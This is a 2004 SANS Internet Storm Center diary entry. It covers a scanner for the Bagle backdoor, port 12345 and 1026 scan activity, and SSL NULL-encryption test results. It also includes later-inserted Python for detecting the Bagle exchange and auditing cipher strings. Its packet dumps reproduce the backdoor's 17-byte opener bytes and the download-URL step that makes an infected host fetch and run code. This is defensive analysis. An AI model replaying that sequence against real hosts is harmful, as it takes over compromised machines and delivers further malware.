Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026

Published: 2004-03-29
Last Updated: 2004-03-30 02:36:20 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Beagle Virus Exploit

====================


Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745
(TCP). We have been monitoring increased scanning activity
for this port. Today, a reader submitted a tool that is
used to scan for Beagle-infected systems. If the tool finds
port 2745 open, it sends the 'magic string' that opens the
backdoor. Next, a URL is sent to the system. The Bagle-infected system
will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"

18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)

18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download

18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http
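The payload bytes in the dump above are easy to misread by hand: tcpdump -x prints everything after the link-layer header, so short frames carry Ethernet padding past the IP total length (the trailing 0x46 after "'http" in step 4 is such padding). The following Python, added here as an example and not part of the original diary, parses tcpdump -x output, recovers each TCP payload by honouring the IP and TCP header lengths, and flags flows to port 2745 whose first data segment matches the 17-byte opener captured in step 2. The packet text embedded in it is a constructed copy of steps 2 to 4, with each header kept on one line.

```python
"""Recover TCP payloads from tcpdump -x output and flag the Bagle backdoor
exchange on TCP/2745 that the diary captured."""
import re

# Constructed sample: the three data-carrying frames from the diary's netcat
# session (steps 2-4), each tcpdump header kept on a single line.
SAMPLE_DUMP = """\
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win 17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win 5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........
18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win 17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http
"""

PKT_LINE = re.compile(r"^(\d{2}:\d{2}:\d{2}\.\d+)\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):")
HEX_LINE = re.compile(r"^0x[0-9a-f]{4}\s")
# tcpdump prints 16-bit groups; the last group of a frame may be a single byte.
HEX_GROUP = re.compile(r"^(?:[0-9a-f]{2}){1,2}$")

BAGLE_PORT = 2745
# The 17-byte opener the scanner sent in step 2, taken from the dump above.
BAGLE_OPENER = bytes.fromhex("43ffffff303030010a1f2b282ba1320100")


def tcp_payload(raw):
    """Return the TCP payload of an IPv4 frame, or b"" if it is not IPv4/TCP.

    The slice is truncated at the IP total length because tcpdump -x also
    prints Ethernet padding that follows short frames.
    """
    if len(raw) < 20 or raw[0] >> 4 != 4 or raw[9] != 6:
        return b""
    ihl = (raw[0] & 0x0F) * 4
    total_len = int.from_bytes(raw[2:4], "big")
    if len(raw) < ihl + 20:
        return b""
    data_off = (raw[ihl + 12] >> 4) * 4
    return bytes(raw[ihl + data_off:total_len])


def parse_dump(text):
    """Turn tcpdump -x text into a list of packets with addresses, ports and payload."""
    packets = []
    cur = None
    for line in text.splitlines():
        m = PKT_LINE.match(line)
        if m:
            cur = {"ts": m.group(1), "src": m.group(2), "sport": int(m.group(3)),
                   "dst": m.group(4), "dport": int(m.group(5)), "raw": bytearray()}
            packets.append(cur)
        elif cur is not None and HEX_LINE.match(line):
            # At most eight groups follow the offset; stop at the ASCII column,
            # which in this sample never looks like a hex group.
            for tok in line.split()[1:9]:
                if not HEX_GROUP.match(tok):
                    break
                cur["raw"] += bytes.fromhex(tok)
        # Any other line (a wrapped header continuation) is ignored.
    for p in packets:
        p["payload"] = tcp_payload(bytes(p["raw"]))
    return packets


def find_bagle_sessions(packets):
    """Flag client flows to TCP/2745 whose first data segment is the captured
    opener; the following client segment is the start of the download URL."""
    flows = {}
    for p in packets:
        if p["dport"] == BAGLE_PORT and p["payload"]:
            flows.setdefault((p["src"], p["sport"], p["dst"]), []).append(p["payload"])
    alerts = []
    for (src, sport, dst), payloads in flows.items():
        if payloads[0] == BAGLE_OPENER:
            alerts.append({"scanner": f"{src}:{sport}", "victim": dst,
                           "url_fragment": payloads[1] if len(payloads) > 1 else b""})
    return alerts


if __name__ == "__main__":
    for alert in find_bagle_sessions(parse_dump(SAMPLE_DUMP)):
        print(alert)
```

Run against the sample, the parser yields the 17-byte opener, a single 0x0a byte for the infected host's reply, and exactly the five bytes "'http" for step 4, and the flow from 10.1.0.129 to 10.1.0.13 is reported once. Matching on the captured opener is a narrow signature; a broader watch on any unsolicited data pushed to port 2745 catches variants of the tool.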

Mailbag: Port 12345 scans

=========================


A user submitted logs showing large numbers of scans against
port 12345 (TCP). This port is commonly associated with the trojan
'Netbus' and other malware. The log did not indicate a new tool,
but rather appears to show a number of sequential connect scans.

Ports in focus: 1026

====================


Scans for port 1026 appear to have increased again over the last
couple of weeks. According to some reports, this is due to popup
spam, which now relies more on compromised systems as its origin.

http://isc.sans.org/port_details.html?port=1026

In the past, only a small number of sources originated this
traffic.

SSL "NULL" Encryption (Errata)

==============================


An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 )
quoted Dr. Neal Krawetz, from Secure Science Corporation as saying
that "One of the SSL encoding methods is "plain text". Most SSL servers
have this disabled by default, but most browsers support it. When plain
text is used, no central certificate authority is consulted and the user
never sees a message asking if a certificate should be accepted (because
"plain text" doesn't use certificates). Keeping that in mind, the little
lock icon may not even indicate an encrypted channel. The little lock
only indicates an SSL connection"

Prompted by reader feedback, we did our own experiments, limiting an
Apache 1.3 server to 'NULL' encryption. We were not able to reproduce
this issue with any recent browser.

Mozilla, in its default configuration, will pop up an error dialog stating
that no common cipher could be found. If 'null'/'plain text'
encryption is specifically enabled, the page will load, but the
certificate will still be validated and any errors will be communicated
to the user.

Microsoft Internet Explorer will show a generic error page. It does
not appear to be possible in MSIE 6 to enable 'NULL' encryption.
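The experiment above hinges on a server's cipher string, which Apache's mod_ssl passes to OpenSSL. The following Python, added here as an example and not part of the diary or of any Apache configuration it used, audits such a string with the local OpenSSL library: it reports which NULL-encryption suites the string enables, or that OpenSSL rejects the string outright. The two cipher strings in it are assumptions: the weak one approximates "limit the server to NULL encryption", and the corrected one is the usual way to exclude null encryption and null authentication.

```python
"""Audit an OpenSSL cipher string (the form Apache's SSLCipherSuite takes)
for NULL-encryption suites, the setting the diary's experiment enabled."""
import ssl

# Assumed settings, not taken from the diary: a NULL-only string and a
# corrected string that excludes null encryption (eNULL) and null
# authentication (aNULL).
WEAK_CIPHER_STRING = "NULL-SHA:NULL-MD5"
CORRECTED_CIPHER_STRING = "HIGH:!aNULL:!eNULL"


def null_ciphers_in(cipher_string):
    """Return the names of NULL-encryption suites that cipher_string enables.

    Returns None when the local OpenSSL rejects the whole string (no usable
    suite), which is what a hardened build does with a NULL-only string.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    try:
        ctx.set_ciphers(cipher_string)
    except ssl.SSLError:
        return None
    # TLS 1.3 suites are listed regardless of set_ciphers(); none of them has
    # zero strength or "NULL" in its name, so the filter leaves them out.
    return [c["name"] for c in ctx.get_ciphers()
            if c["strength_bits"] == 0 or "NULL" in c["name"]]


def audit(cipher_string):
    """One-line verdict on a cipher string: acceptable only with no NULL suites."""
    found = null_ciphers_in(cipher_string)
    if found is None:
        return "rejected by OpenSSL: no usable cipher suite"
    if found:
        return "UNSAFE: null encryption enabled via " + ", ".join(found)
    return "ok: no NULL-encryption suites"


if __name__ == "__main__":
    for label, value in (("weak", WEAK_CIPHER_STRING),
                         ("corrected", CORRECTED_CIPHER_STRING)):
        print(f"{label:9} {value!r}: {audit(value)}")
```

The corrected string always audits clean. Whether the weak string is accepted depends on the OpenSSL build and its security level; either outcome (a list of NULL suites, or outright rejection) is a finding worth knowing before trusting what the lock icon implies about a server.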

---------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org

